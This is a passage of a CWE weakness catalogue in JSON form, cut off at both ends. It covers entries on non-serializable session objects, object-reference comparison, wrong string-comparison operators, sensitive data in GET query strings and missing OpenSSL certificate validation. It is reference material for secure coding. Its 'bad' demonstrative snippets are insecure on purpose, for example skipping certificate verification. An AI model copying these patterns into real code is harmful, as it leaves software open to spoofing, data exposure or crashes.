thus leaving the web application vulnerable to crashes induced by serialization failure. An attacker may be able to mount a denial of service attack by sending enough requests to the server to force the web application to save objects to disk.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Data represented by unserializable objects can be corrupted."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Non-serializability of objects can lead to system crash."}]},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"All objects that become part of session and application scope must implement the java.io.Serializable interface to ensure serializability of containing objects."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following Java example, a Customer Entity JavaBean provides access to customer information in a database for a business application. The Customer Entity JavaBean is used as a session scoped object to return customer information to a Session EJB.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"@Entitypublic class Customer {}","xhtml:br":["","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private String id;private String firstName;private String lastName;private Address address;public Customer() {}public Customer(String id, String firstName, String lastName) {...}@Idpublic String getCustomerId() {...}public void setCustomerId(String id) {...}public String getFirstName() {...}public void setFirstName(String firstName) {...}public String getLastName() {...}public void setLastName(String lastName) {...}@OneToOne()public Address getAddress() {...}public void setAddress(Address address) {...}","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","","","","",""]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":"public class Customer implements Serializable {...}"}],"Body_Text":"However, the Customer Entity JavaBean is an unserialized object which can cause serialization failure and crash the application when the J2EE container attempts to write the object to the system. Session scoped objects must implement the Serializable interface to ensure that the objects serialize properly."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Persistence in J2EE Frameworks","attr":{"@_Date":"2008-04-11"}}}},"595":{"attr":{"@_ID":"595","@_Name":"Comparison of Object References Instead of Object Contents","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program compares object references instead of the contents of the objects themselves, preventing it from detecting equivalent objects.","Extended_Description":"For example, in Java, comparing objects using == usually produces deceptive results, since the == operator compares object references rather than values; often, this means that using == for strings is actually comparing the strings\' references, not their values.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1025","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"JavaScript","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context","Note":"This weakness can lead to erroneous results that can cause unexpected application behaviors."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"In Java, use the equals() method to compare objects instead of the == operator. If using ==, it is important for performance reasons that your objects are created by a static factory, not by a constructor."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-60"},"Intro_Text":"In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String str1 = new String(\\"Hello\\");String str2 = new String(\\"Hello\\");if (str1 == str2) {}","xhtml:br":["",""],"xhtml:div":{"#text":"System.out.println(\\"str1 == str2\\");","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (str1.equals(str2)) {}","xhtml:div":{"#text":"System.out.println(\\"str1 equals str2\\");","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"However, the if statement will not be executed as the strings are compared using the \\"==\\" operator. For Java objects, such as String objects, the \\"==\\" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method:"},{"Intro_Text":"In the following Java example, two BankAccount objects are compared in the isSameAccount method using the == operator.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isSameAccount(BankAccount accountA, BankAccount accountB) {}","xhtml:div":{"#text":"return accountA == accountB;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public boolean isSameAccount(BankAccount accountA, BankAccount accountB) {}","xhtml:div":{"#text":"return accountA.equals(accountB);","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["Using the == operator to compare objects may produce incorrect or deceptive results by comparing object references rather than values. The equals() method should be used to ensure correct results or objects should contain a member variable that uniquely identifies the object.","The following example shows the use of the equals() method to compare the BankAccount objects and the next example uses a class get method to retrieve the bank account number that uniquely identifies the BankAccount object to compare the objects."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP02-J","Entry_Name":"Use the two-argument Arrays.equals() method to compare the contents of arrays"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP02-J","Entry_Name":"Use the two-argument Arrays.equals() method to compare the contents of arrays"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP03-J","Entry_Name":"Do not use the equality operators when comparing values of boxed primitives"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-954"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Other_Notes, Potential_Mitigations, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Incorrect Object Comparison: Syntactic","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Syntactic Object Comparison","attr":{"@_Date":"2009-05-27"}}]}},"596":{"attr":{"@_ID":"596","@_Name":"DEPRECATED: Incorrect Semantic Object Comparison","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness has been deprecated.  It was poorly described and difficult to distinguish from other entries.  It was also inappropriate to assign a separate ID solely because of domain-specific considerations.  Its closest equivalent is CWE-1023.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Relationships, Time_of_Introduction, Type"}],"Previous_Entry_Name":[{"#text":"Incorrect Object Comparison: Semantic","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Semantic Object Comparison","attr":{"@_Date":"2018-03-27"}}]}},"597":{"attr":{"@_ID":"597","@_Name":"Use of Wrong Operator in String Comparison","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses the wrong operator when comparing a string, such as using \\"==\\" when the .equals() method should be used instead.","Extended_Description":"In Java, using == or != to compare two strings for equality actually compares two objects for equality rather than their string values for equality. Chances are good that the two references will never be equal. While this weakness often only affects program correctness, if the equality is used for a security decision, the unintended comparison result could be leveraged to affect program security.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"595","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"595","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"480","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":{"#text":"Within Java, use .equals() to compare string values.Within JavaScript, use == to compare string values.Within PHP, use == to compare a numeric value to a string value. (PHP converts the string to a number.)","xhtml:br":["",""]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-60"},"Intro_Text":"In the example below, two Java String objects are declared and initialized with the same string values. An if statement is used to determine if the strings are equivalent.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String str1 = new String(\\"Hello\\");String str2 = new String(\\"Hello\\");if (str1 == str2) {}","xhtml:br":["",""],"xhtml:div":{"#text":"System.out.println(\\"str1 == str2\\");","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good"},"xhtml:div":{"#text":"if (str1.equals(str2)) {}","xhtml:div":{"#text":"System.out.println(\\"str1 equals str2\\");","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"However, the if statement will not be executed as the strings are compared using the \\"==\\" operator. For Java objects, such as String objects, the \\"==\\" operator compares object references, not object values. While the two String objects above contain the same string values, they refer to different object references, so the System.out.println statement will not be executed. To compare object values, the previous code could be modified to use the equals method:"},{"Intro_Text":"In the example below, three JavaScript variables are declared and initialized with the same values. Note that JavaScript will change a value between numeric and string as needed, which is the reason an integer is included with the strings. An if statement is used to determine whether the values are the same.","Example_Code":[{"#text":"&lt;p id=\\"ieq3s1\\" type=\\"text\\"&gt;(i === s1) is FALSE&lt;/p&gt;&lt;p id=\\"s4eq3i\\" type=\\"text\\"&gt;(s4 === i) is FALSE&lt;/p&gt;&lt;p id=\\"s4eq3s1\\" type=\\"text\\"&gt;(s4 === s1) is FALSE&lt;/p&gt;var i = 65;var s1 = \'65\';var s4 = new String(\'65\');if (i === s1){}if (s4 === i){}if (s4 === s1){}","attr":{"@_Nature":"bad","@_Language":"JavaScript"},"xhtml:br":["","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"document.getElementById(\\"ieq3s1\\").innerHTML = \\"(i === s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq3i\\").innerHTML = \\"(s4 === i) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq3s1\\").innerHTML = \\"(s4 === s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"&lt;p id=\\"ieq2s1\\" type=\\"text\\"&gt;(i == s1) is FALSE&lt;/p&gt;&lt;p id=\\"s4eq2i\\" type=\\"text\\"&gt;(s4 == i) is FALSE&lt;/p&gt;&lt;p id=\\"s4eq2s1\\" type=\\"text\\"&gt;(s4 == s1) is FALSE&lt;/p&gt;var i = 65;var s1 = \'65\';var s4 = new String(\'65\');if (i == s1){}if (s4 == i){}if (s4 == s1){}","attr":{"@_Nature":"good","@_Language":"JavaScript"},"xhtml:br":["","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"document.getElementById(\\"ieq2s1\\").innerHTML = \\"(i == s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq2i\\").innerHTML = \\"(s4 == i) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"document.getElementById(\\"s4eq2s1\\").innerHTML = \\"(s4 == s1) is TRUE\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":{"xhtml:p":["However, the body of the if statement will not be executed, as the \\"===\\" compares both the type of the variable AND the value. As the types of the first comparison are number and string, it fails. The types in the second are int and reference, so this one fails as well. The types in the third are reference and string, so it also fails.","While the variables above contain the same values, they are contained in different types, so the document.getElementById... statement will not be executed in any of the cases.","To compare object values, the previous code is modified and shown below to use the \\"==\\" for value comparison so the comparison in this example executes the HTML statement:"]}},{"Intro_Text":"In the example below, two PHP variables are declared and initialized with the same numbers - one as a string, the other as an integer. Note that PHP will change the string value to a number for a comparison. An if statement is used to determine whether the values are the same.","Example_Code":[{"#text":"var $i = 65;var $s1 = \\"65\\";if ($i === $s1){}else{}","attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"echo \'($i === $s1) is TRUE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'($i === $s1) is FALSE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"var $i = 65;var $s1 = \\"65\\";if ($i == $s1){}else{}","attr":{"@_Nature":"good","@_Language":"PHP"},"xhtml:br":["","","","","","","","",""],"xhtml:div":[{"#text":"echo \'($i == $s1) is TRUE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'($i == $s1) is FALSE\'. \\"\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]}],"Body_Text":{"xhtml:p":["However, the body of the if statement will not be executed, as the \\"===\\" compares both the type of the variable AND the value. As the types of the first comparison are number and string, it fails.","While the variables above contain the same values, they are contained in different types, so the TRUE portion of the if statement will not be executed.","To compare object values, the previous code is modified and shown below to use the \\"==\\" for value comparison (string converted to number) so the comparison in this example executes the TRUE statement:"]}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP03-J","Entry_Name":"Do not use the equality operators when comparing values of boxed primitives"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP03-J","Entry_Name":"Do not use the equality operators when comparing values of boxed primitives"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP35-PL","Entry_Name":"Use the correct operator type for comparing values","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Typos&#34;, Page 289"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2006-12-15"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Description, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Erroneous String Compare","attr":{"@_Date":"2008-04-11"}}}},"598":{"attr":{"@_ID":"598","@_Name":"Use of GET Request Method With Sensitive Query Strings","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The web application uses the HTTP GET method to process a request and includes sensitive information in the query string of that request.","Extended_Description":"The query string for the URL could be saved in the browser\'s history, passed through Referers to other web sites, stored in web logs, or otherwise recorded in other sources.  If the query string contains sensitive information such as session identifiers, then attackers can use this information to launch further attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"201","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"At a minimum, attackers can garner information from query strings that can be utilized in escalating their method of attack, such as information about the internal workings of the application or database column names. Successful exploitation of query string parameter vulnerabilities could lead to an attacker impersonating a legitimate user, obtaining proprietary data, or simply executing actions not intended by the application developers."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"When sensitive information is sent, use the POST method (e.g. registration form)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description"}],"Previous_Entry_Name":[{"#text":"Information Leak Through GET Request","attr":{"@_Date":"2008-04-11"}},{"#text":"Information Leak Through Query Strings in GET Request","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Query Strings in GET Request","attr":{"@_Date":"2020-02-24"}}]}},"599":{"attr":{"@_ID":"599","@_Name":"Missing Validation of OpenSSL Certificate","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses OpenSSL and trusts or uses a certificate without using the SSL_get_verify_result() function to ensure that the certificate satisfies all necessary security requirements.","Extended_Description":"This could allow an attacker to use an invalid certificate to claim to be a trusted host, use expired certificates, or conduct other attacks that could be detected if the certificate is properly validated.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"295","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The data read may not be properly secured, it might be viewed by an attacker."},{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"Trust afforded to the system in question may allow for spoofing or redirection attacks."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"If the certificate is not checked, it may be possible for a redirection or spoofing attack to allow a malicious host with a valid certificate to provide data under the guise of a trusted host. While the attacker in question may have a valid certificate, it may simply be a valid certificate for a different site. In order to ensure data integrity, we must check that the certificate is valid, and that it pertains to the site we wish to access."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Ensure that proper authentication is included in the system design."},{"Phase":"Implementation","Description":"Understand and properly implement all checks necessary to ensure the identity of entities involved in encrypted communications."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-125"},"Intro_Text":"The following OpenSSL code ensures that the host has a certificate.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["","","","","",""],"xhtml:i":["// got certificate, host can be trusted","//foo=SSL_get_verify_result(ssl);","//if (X509_V_OK==foo) ..."]}}}},"Body_Text":"Note that the code does not call SSL_get_verify_result(ssl), which effectively disables the validation step that checks the certificate."}},"Notes":{"Note":{"#text":"CWE-295 and CWE-599 are very similar, although CWE-599 has a more narrow scope that is only applied to OpenSSL certificates. As a result, other children of CWE-295 can be regarded as children of CWE-599 as well. CWE\'s use of one-dimensional hierarchical relationships is not well-suited to handle different kinds of abstraction relationships based on concepts like types of resources (\\"OpenSSL certificate\\" as a child of \\"any certificate\\") and types of behaviors (\\"not validating expiration\\" as a child of \\"improper validation\\").","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-12-15","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"No OpenSSL Certificate Check Performed before Use","attr":{"@_Date":"2008-04-11"}},{"#text":"Trust of OpenSSL Certificate Without Validation","attr":{"@_Date":"2013-02-21"}}]}},"600":{"attr":{"@_ID":"600","@_Name":"Uncaught Exception in Servlet","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The Servlet does not catch all 